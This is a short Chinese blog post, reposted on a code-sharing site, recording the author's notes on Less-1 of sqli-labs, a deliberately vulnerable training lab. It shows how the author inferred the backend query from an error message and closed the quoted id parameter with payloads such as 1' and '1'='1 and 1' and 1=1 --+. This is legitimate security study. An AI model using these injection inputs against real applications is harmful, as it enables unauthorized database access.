码迷,mamicode.com
首页 > 数据库 > 详细

sqli-labs less1 学习心得

时间:2017-11-22 00:00:35      阅读:256      评论:0      收藏:0      [点我收藏+]

标签:medium   srm   dss   sql语句   bsp   ebe   doc   png   har   

id=1/ id=1 and 1=1结果正常

id=1 and 1=2结果正常,不合理

id=1‘提示:

技术分享图片

分析:

use near ‘   ‘   1‘   ‘ LIMIT 0,1    ‘

所以正确sql语句 为:

select username,password from table where id=‘input‘

所以:

id = 1‘ and ‘1‘=‘1

结果正确

即:

select username,password from table where id=‘1‘ and ‘1‘=‘1‘

或者:

id = 1‘ and 1=1 --+

结果正确

即:

select username,password from table where id=‘1‘ and 1=1 --+‘

 

sqli-labs less1 学习心得

标签:medium   srm   dss   sql语句   bsp   ebe   doc   png   har   

原文地址:http://www.cnblogs.com/liuyimin/p/7875455.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!